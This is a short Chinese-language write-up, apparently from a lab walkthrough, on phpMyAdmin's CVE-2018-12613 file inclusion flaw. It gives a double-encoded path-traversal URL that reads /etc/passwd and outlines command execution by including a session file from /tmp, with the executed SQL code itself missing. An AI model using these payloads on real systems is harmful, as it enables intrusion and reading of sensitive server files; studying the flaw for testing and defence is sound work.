PHPMYADMIN:CVE-2018-12613后台任意文件包含漏洞
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。
payload:
http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
可见,可见/etc/passwd被读取,说明文件包含漏洞存在。
通过session达成命令执行:
【1】在sql中执行一个代码,比如:
【2】点击执行的时候抓包哦,拿到phpmyadmin的session:
【3】
index.php?target=db_sql.php%3f/../../../../../../tmp/sess_21441e4669faa2af8451bb0b9b2c6a2f